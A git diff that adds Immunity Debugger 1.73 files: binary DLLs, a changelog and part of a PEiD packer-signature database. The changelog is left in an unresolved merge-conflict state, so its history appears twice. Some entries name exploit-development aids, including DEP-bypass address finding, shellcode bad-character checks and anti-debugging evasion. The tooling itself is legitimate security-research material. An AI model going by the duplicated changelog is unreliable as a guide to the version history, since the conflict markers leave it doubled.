diff --git a/1.73/Bookmark.dll b/1.73/Bookmark.dll
new file mode 100755
index 0000000..9d2800c
Binary files /dev/null and b/1.73/Bookmark.dll differ
diff --git a/1.73/Changelog.txt b/1.73/Changelog.txt
new file mode 100755
index 0000000..726612a
--- /dev/null
+++ b/1.73/Changelog.txt
@@ -0,0 +1,696 @@
+<<<<<<< .mine
+1.60 Build 0
+
+New Features:
+
+- Debugger
+ o Added 'Use Symbol Server' option
+ [http://forum.immunityinc.com/index.php?topic=162]
+ o Improved Getallnames
+ o Added timestamp to log events
+
+- Immunity Debugger API
+ o Added getAllSymbolsFromModule method
+ o Added libcontrolflow.py
+ Container for classes DominatorTree and ControlFlowAnalysis
+ o Added Clear function to FastLogHook.
+
+- PyCommands
+ o Added findloop.py: Find natural loops given a function start.
+ o Added treedll.py: Creates imported dll tree.
+ o Added shellcodediff.py: Check for badchars.
+
+
+- Bug Fixes:
+ o Fixed POST_ANALYSIS_HOOK "FATAL ERROR"
+ o Fixed Arguments overflow (Thanks David Wetson for reporting this one!)
+ o Local Symbol Path issue
+ o Analysis second pass option now works
+ o Getallsymbols now correctly creates the PyDict [Import/Export/Library issue]
+
+
+1.50 Build 0
+
+New Features:
+
+- Debugger:
+ o Added "Servers" folder with specific pycommand listeners
+
+- Memory Pages:
+ o Working on Windows Vista
+
+Immunity Debugger API:
+ o Added imm.vmQuery() wrapper [Query Virtual Memory pages]
+ o The MemoryPage class has been improved.
+ - Protect and Allocation Protect Flags are queried realtime
+ - You can get a human readable flag passing human = 1 to
+ page.getAccess() and page.getInitAccess()
+ o Added:
+ - searchOnExecute()
+ - searchOnRead()
+ - searchOnWrite()
+ These methods will search in any memory page with access = any combination.
+ o Modified:
+ - Search()
+ - searchShort()
+ - searchLong()
+ to receive an extra flag parameter to specify memory protection type
+ when searching.
+ o Added imm.isAdmin() : is ID running as admin?
+ o Added Thread class to debugtypes.py
+ o Added imm.getAllThreads() method
+ o librecognition.py : Improved REGEXP support for the indexed register search
+ o Added Function.findRetValue Find all the possible values on a Function
+ o GFlags class Handle Windows Global Flags.
+
+PyCommands:
+
+ o gflags.py: Enable/Disable Windows Global Flags
+ o recognize.py: Backward compatability
+ o Added hookssl.py
+ o Added ssl_listener.py to Servers directory
+ o Added hookndr.py Hooks the NDR unmarshalling routines and prints them
+ out so you can see which ones worked
+ o Added nohooks.py : remove all hooks from memory
+
+Bug Fixes:
+
+- Debugger Core
+ o The memory page protect information is correctly displayed now.
+ o Fixed Second Analisys pass repeated entries bug.
+ o Fixed thread state swap issue which was leading to a memleak.
+
+
+1.40 Build 0
+
+New Features:
+
+- Debugger Core:
+ o Added Silent Debugging Flag [accesible via Debugging options ALT-O or via immlib]
+ http://forum.immunityinc.com/index.php?topic=157.0
+ o Added Analysis Second Pass [Decoding Functions]
+ http://forum.immunityinc.com/index.php?topic=163.0
+
+- Debugger GUI Core:
+ o Now you can add headers + other useful information on every Row
+ displayed at the Disasm Window. The information will be saved
+ as part of dump struct.
+ o Dettach option added to File Menu: Go to File -> Dettach [You need to be attached to
+ gray out Dettach]
+ http://forum.immunityinc.com/index.php?topic=158.0
+
+
+- Debugger GUI:
+ o Right click on disasm line -> Add Header will add headers to your line
+
+
+
+- Immunity Debugger API:
+ o Row Headers / Adding Lines to CPU
+ - Added imm.addHeader() and imm.getHeader() methods.
+ - imm.addLine behaves like addHeader()
+ - Added imm.removeHeader()/imm.removeLine() && imm.getHeader()/imm.getLine()
+ - Added imm.getTraceArgs()
+
+ o Added imm.goSilent() method.
+ o Added imm.undecorateName() method: Undecorate symbol names
+ http://forum.immunityinc.com/index.php?topic=159.0
+ o Added imm.Dettach() method: Dettach current process from debugger
+ o Added imm.prepareForNewProcess() method: Prepare Debugger core for a fresh start
+ o Updated BoB's UserDB.txt (http://peid.info/BobSoft/Downloads.html)
+
+
+- PyCommands:
+ o Added namefunc.py : a simple samplescript that uses imm.addHeader to name
+ functions in module
+ o Added traceargs.py: find User supplied arguments into a given function.
+ o Added JMS's Mike & Boo script
+ o User Contributed PyCommands:
+ - BoB (http://PEiD.info/BobSoft/)
+ * scanpe.py (http://forum.immunityinc.com/index.php?topic=137.0)
+ * hidedebug.py (http://forum.immunityinc.com/index.php?topic=140.0)
+ * bpxep.py (http://forum.immunityinc.com/index.php?topic=138.0)
+
+
+Bug Fixes:
+
+- Fixed error when adding knowledge and changing python enviroments later.
+ (__dict__ not accesible in restricted mode error)
+
+1.30 Build 0
+November 1, 2007
+
+New Features:
+
+- Immunity Debugger API
+ o Hooks
+ - Hooks can receive force flag to overwrite previously placed hooks
+ - Hooks can receive time to live in memory parameter when adding
+ (After the TTL expires, the hook is automatically removed from memory)
+ - Hooks has a runTimeout method to execute code after TTL expires
+ o Choose thread enviroment to execute the ttl code
+ - Added special kind of AccessViolation hook: RunUntilAV() class
+ o Added setHardwareBreakpoint method
+ o Address deleteBreakpoint method
+ o Process flow:
+ o Improved methods:
+ - stepOver
+ - stepIn
+ - Run
+ - Attach
+ o Added methods:
+ - openProcess
+ - restartProcess
+ - pause
+ - runTillReturn
+
+
+
+
+- PyCommands
+ o search allows multiple line searching: !search add esp,const\nret
+ o Added sql_listener and sqlhooker
+ o Added Example processflow script
+
+
+Bug Fixes:
+
+- Fixed imm.ps() to correctly fetch udp port list
+ http://forum.immunityinc.com/index.php?topic=84.0
+- Fixed Get references methods
+
+1.20 Build 0
+October 1, 2007
+
+New Features:
+
+- Immunity Debugger API
+ o immlib.getThreadId() method added: return the current debuggee thread id
+ o immlib.getCallTree() method added: return the call tree for given address
+ o immlib.setFocus() method added: focus ID window
+ o immlib.isValidHandle() method added: check if a HWND is still valid
+ o immlib.getInfoPanel() method added: get information from panel window
+ and optionally receives a type flag to force the kind of comment fetched.
+ o imm.findPacker() method added: find packers/cryptors on a file or a loaded
+ module
+ o imm.getMemoryPagebyOwner(): Find all the memory pages belonging to a module.
+ o immlib.ps() returns two extra objects: the tcp list and the udp list
+ o immlib.getComment() now will try to fetch all types of comments
+ o Added new HOOKTYPE: PRE_BP_HOOK, hooks exactly before the breakpoint is hit
+ (Decoding events timeline)
+ o New Vista support for libheap
+ o Custom Tables has "Clear Window" menu now
+ o Added several methods from librecognize
+
+- PyCommands
+ o findpacker added. (Use of immlib.findPacker to get Packers from a module)
+ o recognize added. (Function Recognizing using heuristic patterns)
+ o Hippie now can filter by heap
+ o heap updated to work with new Vista Heap
+ o Optimized code for stackvars (Memory usage reduction during runtime)
+
+
+- Core
+ o Pyshell can be focused once created with alt-F11
+ o Shortcut for attach process added: Ctrl+F1
+ o Added librecognition.py (Library for function recognizing)
+
+- Graph
+ o immvcglib.generateGraphFromBuf() method added: play with your own vcg files!
+ o Redesign of VCG parser: easier to read, easier to use.
+
+
+
+Bug Fixes:
+
+o Return value (HWND) of createTable
+o Fixed Attach Search Filtering :
+ http://forum.immunityinc.com/index.php?topic=49.0
+o Grapher: Vertex lastline jumps correctly displayed now
+o Fixed crash when searching on modules:
+ http://forum.immunityinc.com/index.php?topic=63.0
+o Fixed search issue on protected binary:
+ http://forum.immunityinc.com/index.php?topic=34
+o Fixed breakpoint/logpoint hooks issue (logic/stepping inside a hook)
+o Fixed PyString_AsString() missbehaviour
+o Fixed PyCommand Gui Arguments box to receive \x00 as argument
+o Fixed imm.getModulebyAddress() to receive any module address and not only module entry point
+ http://forum.immunityinc.com/index.php?topic=74.0
+
+
+
+1.1 Build 2
+August 31, 2007
+
+Python Thread entering the spiral zone has been fixed
+
+1.1 Build 0
+August 30, 2007
+
+New Features:
+
+o Interactive Python Shell added
+o Lookaside enhanced output + Discovery option
+o libdatatype "Get" Function
+o Get OS information methods
+o Ero Carrera's pefile.py (http://code.google.com/p/pefile/)
+o Python engine rewritten to properly use thread locking/unlocking
+o Added ignoreSingleStep method for immlib (TRANSPARENT + CONVETIONAL)
+o Attach process window is now dinamically searchable
+o Added clean ID memory methods inside immlib
+o Added Stack analize library (libstackanalize)
+o Fixed some memleak on Disasm
+o Fixed wrong arguments on Disasm operand
+o Improved Patch command
+o Safeseh moved into a PyCommand
+
+New Scripts:
+
+o searchcrypt PyCommand
+o stackvars PyCommand
+o search PyCommand
+
+Bug Fixes:
+
+o Solved 'ij' issue inside attach window
+o Fixed VCG parser (Blocks display fully address now)
+o Fixed traceback error when trying to graph and no attached
+o Fixed printfloat() format error
+o Fixed ret value of Getaddrfromexp in case of non-existand expression
+
+
+1.0 Build 42
+August 1, 2007
+
+o Released as product
+o Includes:
+ o Full Python API:
+ - immlib (main lib)
+ - internals
+ - immutils
+ - debugtypes
+ - libdatatype
+ - libanalize
+ - libhook
+ - libevent
+ -
+libheap
+ - pelib
+ - immvcglib
+ - graphclass
+
+ o Command Box (with remote listener + command line client)
+ o Python Orthogonal Drawing
+ o Examples for PyCommands/PyHooks/PyScripts
+ o Ready to use PyCommands/PyHooks:
+
+ chunkanalizehook Analize a Specific Chunk at a specific moment
+ cmpmem Compare memory with a file (file been a dump from prettyhexprint)
+ dependencies Find a exported function on the loaded dll
+ duality Looks for mapped address that can be 'transformed' into opcodes
+ findantidep Find address to bypass software DEP
+ finddatatype funsniff
+ funsniff funsniff
+ getevent Get a log of current debugevent
+ getrpc Get the RPC information of a loaded dll
+ heap Immunity Heap Dump
+ hippie Syscall Fuzzer
+ hookheap - DESC is not defined for this command -
+ list List PyCommands
+ lookaside - DESC is not defined for this command -
+ mark Static Analysis: Mark the tiny ones
+ modptr !modptr Patch all Function Pointers and detect when they triggered
+ openfile Open a File
+ patch Patches anti-debugging protection , [-t TYPE_OF_PROTECTION]
+ pyexec Non interactive python shell [immlib already imported]
+ searchcode Search code in memory
+ searchheap Search the heap for specific chunks
+ safeseh Show exceptions handlers registered with SEH
+ pe_export Export Module
+
+
+ o Lib references and Documentation
+=======
+1.73 Build 10
+
+- Immunity Debugger API
+ o Added inject_dll() method to load a DLL into the debuggee
+
+- Bug Fixes
+ o Fixed pathing issue when updater.exe spawns debugger
+ o Fixed MemoryPage.getOwner() to return only the module name
+ o Fixed hang when opening Immlib-> Lib References menu item
+
+
+
+1.70 Build 0
+
+New Features:
+
+- Debugger
+ o Added support for variable decoding when second pass analysis enabled
+
+- Immunity Debugger API
+ o Added getVariable/setVariable methods
+ o Added driverlib.py for analyzing drivers
+
+- PyCommands
+ o activex.py for auditing ActiveX controls
+
+- Bug Fixes
+ o Fixed Python pathing issue when JIT debugging/spawning from right-click
+ o Fixed Module.getName() method to return only the module name
+ o Fixed length check error in imm.Assemble()
+
+
+1.60 Build 0
+
+New Features:
+
+- Debugger
+ o Added 'Use Symbol Server' option
+ [http://forum.immunityinc.com/index.php?topic=162]
+ o Improved Getallnames
+ o Added timestamp to log events
+
+- Immunity Debugger API
+ o Added getAllSymbolsFromModule method
+ o Added libcontrolflow.py
+ Container for classes DominatorTree and ControlFlowAnalysis
+ o Added Clear function to FastLogHook.
+
+- PyCommands
+ o Added findloop.py: Find natural loops given a function start.
+ o Added treedll.py: Creates imported dll tree.
+
+
+- Bug Fixes:
+ o Fixed POST_ANALYSIS_HOOK "FATAL ERROR"
+ o Fixed Arguments overflow (Thanks David Wetson for reporting this one!)
+ o Local Symbol Path issue
+ o Analysis second pass option now works
+ o Getallsymbols now correctly creates the PyDict [Import/Export/Library issue]
+
+
+1.50 Build 0
+
+New Features:
+
+- Debugger:
+ o Added "Servers" folder with specific pycommand listeners
+
+- Memory Pages:
+ o Working on Windows Vista
+
+Immunity Debugger API:
+ o Added imm.vmQuery() wrapper [Query Virtual Memory pages]
+ o The MemoryPage class has been improved.
+ - Protect and Allocation Protect Flags are queried realtime
+ - You can get a human readable flag passing human = 1 to
+ page.getAccess() and page.getInitAccess()
+ o Added:
+ - searchOnExecute()
+ - searchOnRead()
+ - searchOnWrite()
+ These methods will search in any memory page with access = any combination.
+ o Modified:
+ - Search()
+ - searchShort()
+ - searchLong()
+ to receive an extra flag parameter to specify memory protection type
+ when searching.
+ o Added imm.isAdmin() : is ID running as admin?
+ o Added Thread class to debugtypes.py
+ o Added imm.getAllThreads() method
+ o librecognition.py : Improved REGEXP support for the indexed register search
+ o Added Function.findRetValue Find all the possible values on a Function
+ o GFlags class Handle Windows Global Flags.
+
+PyCommands:
+
+ o gflags.py: Enable/Disable Windows Global Flags
+ o recognize.py: Backward compatability
+ o Added hookssl.py
+ o Added ssl_listener.py to Servers directory
+ o Added hookndr.py Hooks the NDR unmarshalling routines and prints them
+ out so you can see which ones worked
+ o Added nohooks.py : remove all hooks from memory
+
+Bug Fixes:
+
+- Debugger Core
+ o The memory page protect information is correctly displayed now.
+ o Fixed Second Analisys pass repeated entries bug.
+ o Fixed thread state swap issue which was leading to a memleak.
+
+
+1.40 Build 0
+
+New Features:
+
+- Debugger Core:
+ o Added Silent Debugging Flag [accesible via Debugging options ALT-O or via immlib]
+ http://forum.immunityinc.com/index.php?topic=157.0
+ o Added Analysis Second Pass [Decoding Functions]
+ http://forum.immunityinc.com/index.php?topic=163.0
+
+- Debugger GUI Core:
+ o Now you can add headers + other useful information on every Row
+ displayed at the Disasm Window. The information will be saved
+ as part of dump struct.
+ o Dettach option added to File Menu: Go to File -> Dettach [You need to be attached to
+ gray out Dettach]
+ http://forum.immunityinc.com/index.php?topic=158.0
+
+
+- Debugger GUI:
+ o Right click on disasm line -> Add Header will add headers to your line
+
+
+
+- Immunity Debugger API:
+ o Row Headers / Adding Lines to CPU
+ - Added imm.addHeader() and imm.getHeader() methods.
+ - imm.addLine behaves like addHeader()
+ - Added imm.removeHeader()/imm.removeLine() && imm.getHeader()/imm.getLine()
+ - Added imm.getTraceArgs()
+
+ o Added imm.goSilent() method.
+ o Added imm.undecorateName() method: Undecorate symbol names
+ http://forum.immunityinc.com/index.php?topic=159.0
+ o Added imm.Dettach() method: Dettach current process from debugger
+ o Added imm.prepareForNewProcess() method: Prepare Debugger core for a fresh start
+ o Updated BoB's UserDB.txt (http://peid.info/BobSoft/Downloads.html)
+
+
+- PyCommands:
+ o Added namefunc.py : a simple samplescript that uses imm.addHeader to name
+ functions in module
+ o Added traceargs.py: find User supplied arguments into a given function.
+ o Added JMS's Mike & Boo script
+ o User Contributed PyCommands:
+ - BoB (http://PEiD.info/BobSoft/)
+ * scanpe.py (http://forum.immunityinc.com/index.php?topic=137.0)
+ * hidedebug.py (http://forum.immunityinc.com/index.php?topic=140.0)
+ * bpxep.py (http://forum.immunityinc.com/index.php?topic=138.0)
+
+
+Bug Fixes:
+
+- Fixed error when adding knowledge and changing python enviroments later.
+ (__dict__ not accesible in restricted mode error)
+
+1.30 Build 0
+November 1, 2007
+
+New Features:
+
+- Immunity Debugger API
+ o Hooks
+ - Hooks can receive force flag to overwrite previously placed hooks
+ - Hooks can receive time to live in memory parameter when adding
+ (After the TTL expires, the hook is automatically removed from memory)
+ - Hooks has a runTimeout method to execute code after TTL expires
+ o Choose thread enviroment to execute the ttl code
+ - Added special kind of AccessViolation hook: RunUntilAV() class
+ o Added setHardwareBreakpoint method
+ o Address deleteBreakpoint method
+ o Process flow:
+ o Improved methods:
+ - stepOver
+ - stepIn
+ - Run
+ - Attach
+ o Added methods:
+ - openProcess
+ - restartProcess
+ - pause
+ - runTillReturn
+
+
+
+
+- PyCommands
+ o search allows multiple line searching: !search add esp,const\nret
+ o Added sql_listener and sqlhooker
+ o Added Example processflow script
+
+
+Bug Fixes:
+
+- Fixed imm.ps() to correctly fetch udp port list
+ http://forum.immunityinc.com/index.php?topic=84.0
+- Fixed Get references methods
+
+1.20 Build 0
+October 1, 2007
+
+New Features:
+
+- Immunity Debugger API
+ o immlib.getThreadId() method added: return the current debuggee thread id
+ o immlib.getCallTree() method added: return the call tree for given address
+ o immlib.setFocus() method added: focus ID window
+ o immlib.isValidHandle() method added: check if a HWND is still valid
+ o immlib.getInfoPanel() method added: get information from panel window
+ and optionally receives a type flag to force the kind of comment fetched.
+ o imm.findPacker() method added: find packers/cryptors on a file or a loaded
+ module
+ o imm.getMemoryPagebyOwner(): Find all the memory pages belonging to a module.
+ o immlib.ps() returns two extra objects: the tcp list and the udp list
+ o immlib.getComment() now will try to fetch all types of comments
+ o Added new HOOKTYPE: PRE_BP_HOOK, hooks exactly before the breakpoint is hit
+ (Decoding events timeline)
+ o New Vista support for libheap
+ o Custom Tables has "Clear Window" menu now
+ o Added several methods from librecognize
+
+- PyCommands
+ o findpacker added. (Use of immlib.findPacker to get Packers from a module)
+ o recognize added. (Function Recognizing using heuristic patterns)
+ o Hippie now can filter by heap
+ o heap updated to work with new Vista Heap
+ o Optimized code for stackvars (Memory usage reduction during runtime)
+
+
+- Core
+ o Pyshell can be focused once created with alt-F11
+ o Shortcut for attach process added: Ctrl+F1
+ o Added librecognition.py (Library for function recognizing)
+
+- Graph
+ o immvcglib.generateGraphFromBuf() method added: play with your own vcg files!
+ o Redesign of VCG parser: easier to read, easier to use.
+
+
+
+Bug Fixes:
+
+o Return value (HWND) of createTable
+o Fixed Attach Search Filtering :
+ http://forum.immunityinc.com/index.php?topic=49.0
+o Grapher: Vertex lastline jumps correctly displayed now
+o Fixed crash when searching on modules:
+ http://forum.immunityinc.com/index.php?topic=63.0
+o Fixed search issue on protected binary:
+ http://forum.immunityinc.com/index.php?topic=34
+o Fixed breakpoint/logpoint hooks issue (logic/stepping inside a hook)
+o Fixed PyString_AsString() missbehaviour
+o Fixed PyCommand Gui Arguments box to receive \x00 as argument
+o Fixed imm.getModulebyAddress() to receive any module address and not only module entry point
+ http://forum.immunityinc.com/index.php?topic=74.0
+
+
+
+1.1 Build 2
+August 31, 2007
+
+Python Thread entering the spiral zone has been fixed
+
+1.1 Build 0
+August 30, 2007
+
+New Features:
+
+o Interactive Python Shell added
+o Lookaside enhanced output + Discovery option
+o libdatatype "Get" Function
+o Get OS information methods
+o Ero Carrera's pefile.py (http://code.google.com/p/pefile/)
+o Python engine rewritten to properly use thread locking/unlocking
+o Added ignoreSingleStep method for immlib (TRANSPARENT + CONVETIONAL)
+o Attach process window is now dinamically searchable
+o Added clean ID memory methods inside immlib
+o Added Stack analize library (libstackanalize)
+o Fixed some memleak on Disasm
+o Fixed wrong arguments on Disasm operand
+o Improved Patch command
+o Safeseh moved into a PyCommand
+
+New Scripts:
+
+o searchcrypt PyCommand
+o stackvars PyCommand
+o search PyCommand
+
+Bug Fixes:
+
+o Solved 'ij' issue inside attach window
+o Fixed VCG parser (Blocks display fully address now)
+o Fixed traceback error when trying to graph and no attached
+o Fixed printfloat() format error
+o Fixed ret value of Getaddrfromexp in case of non-existand expression
+
+
+1.0 Build 42
+August 1, 2007
+
+o Released as product
+o Includes:
+ o Full Python API:
+ - immlib (main lib)
+ - internals
+ - immutils
+ - debugtypes
+ - libdatatype
+ - libanalize
+ - libhook
+ - libevent
+ -
+libheap
+ - pelib
+ - immvcglib
+ - graphclass
+
+ o Command Box (with remote listener + command line client)
+ o Python Orthogonal Drawing
+ o Examples for PyCommands/PyHooks/PyScripts
+ o Ready to use PyCommands/PyHooks:
+
+ chunkanalizehook Analize a Specific Chunk at a specific moment
+ cmpmem Compare memory with a file (file been a dump from prettyhexprint)
+ dependencies Find a exported function on the loaded dll
+ duality Looks for mapped address that can be 'transformed' into opcodes
+ findantidep Find address to bypass software DEP
+ finddatatype funsniff
+ funsniff funsniff
+ getevent Get a log of current debugevent
+ getrpc Get the RPC information of a loaded dll
+ heap Immunity Heap Dump
+ hippie Syscall Fuzzer
+ hookheap - DESC is not defined for this command -
+ list List PyCommands
+ lookaside - DESC is not defined for this command -
+ mark Static Analysis: Mark the tiny ones
+ modptr !modptr Patch all Function Pointers and detect when they triggered
+ openfile Open a File
+ patch Patches anti-debugging protection , [-t TYPE_OF_PROTECTION]
+ pyexec Non interactive python shell [immlib already imported]
+ searchcode Search code in memory
+ searchheap Search the heap for specific chunks
+ safeseh Show exceptions handlers registered with SEH
+ pe_export Export Module
+
+
+ o Lib references and Documentation
+>>>>>>> .r444
diff --git a/1.73/Cmdline.dll b/1.73/Cmdline.dll
new file mode 100755
index 0000000..b092f5e
Binary files /dev/null and b/1.73/Cmdline.dll differ
diff --git a/1.73/Data/UserDB.TXT b/1.73/Data/UserDB.TXT
new file mode 100755
index 0000000..da0cf81
--- /dev/null
+++ b/1.73/Data/UserDB.TXT
@@ -0,0 +1,7331 @@
+; By BoB / Team PEiD ..
+; 1832 Signatures in list ..
+
+[!EP (ExE Pack) V1.0 -> Elite Coding Group]
+signature = 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10
+ep_only = true
+
+[!EPack 1.4 lite (final) - by 6aHguT]
+signature = 33 C0 8B C0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+ep_only = true
+
+[$pirit v1.5]
+signature = ?? ?? ?? 5B 24 55 50 44 FB 32 2E 31 5D
+ep_only = true
+
+[$PIRIT v1.5]
+signature = B4 4D CD 21 E8 ?? ?? FD E8 ?? ?? B4 51 CD 21
+ep_only = true
+
+[* PseudoSigner 0.1 --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [32Lite 0.03] --> Anorganix]
+signature = 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 ?? ?? ?? ?? E9
+ep_only = true
+
+[* PseudoSigner 0.1 [ACProtect 1.09] --> Anorganix]
+signature = 60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 02 00 00 90 90 90 04 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [Armadillo 3.00] --> Anorganix]
+signature = 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [ASPack 2.xx Heuristic] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95
+ep_only = true
+
+[* PseudoSigner 0.1 [ASProtect] --> Anorganix]
+signature = 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Borland Delphi 3.0] --> Anorganix]
+signature = 55 8B EC 83 C4 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [Borland Delphi 5.0 KOL/MCK] --> Anorganix]
+signature = 55 8B EC 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 FF 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 EB 04 00 00 00 01 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [Borland Delphi 6.0 - 7.0] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 53 8B D8 33 C0 A3 09 09 09 00 6A 00 E8 09 09 00 FF A3 09 09 09 00 A1 09 09 09 00 A3 09 09 09 00 33 C0 A3 09 09 09 00 33 C0 A3 09 09 09 00 E8
+ep_only = true
+
+[* PseudoSigner 0.1 [CD-Cops II] --> Anorganix]
+signature = 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Code-Lock] --> Anorganix]
+signature = 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B E9
+ep_only = true
+
+[* PseudoSigner 0.1 [CodeSafe 2.0] --> Anorganix]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Crunch/PE Heuristic] --> Anorganix]
+signature = 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [DEF 1.0] --> Anorganix]
+signature = BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [DxPack 1.0] --> Anorganix]
+signature = 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [ExeSmasher] --> Anorganix]
+signature = 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B E9
+ep_only = true
+
+[* PseudoSigner 0.1 [FSG 1.0] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9
+ep_only = true
+
+[* PseudoSigner 0.1 [FSG 1.31] --> Anorganix]
+signature = BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Gleam 1.00] --> Anorganix]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF E9
+ep_only = true
+
+[* PseudoSigner 0.1 [JDPack 1.x / JDProtect 0.9] --> Anorganix]
+signature = 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [LCC Win32 1.x] --> Anorganix]
+signature = 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [LCC Win32 DLL] --> Anorganix]
+signature = 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 ?? ?? ?? ?? E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Lockless Intro Pack] --> Anorganix]
+signature = 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD E9
+ep_only = true
+
+[* PseudoSigner 0.1 [LTC 1.3] --> Anorganix]
+signature = 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Macromedia Flash Projector 6.0] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C E9
+ep_only = true
+
+[* PseudoSigner 0.1 [MEW 11 SE 1.0] --> Anorganix]
+signature = E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Microsoft Visual Basic 5.0 - 6.0] --> Anorganix]
+signature = 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Microsoft Visual Basic 6.0 DLL] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 5A 68 90 90 90 90 68 90 90 90 90 52 E9 90 90 FF
+ep_only = true
+
+[* PseudoSigner 0.1 [Microsoft Visual C++ 5.0+ (MFC)] --> Anorganix]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Microsoft Visual C++ 6.0 (Debug Version)] --> Anorganix]
+signature = 55 8B EC 51 90 90 90 01 01 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90
+ep_only = true
+
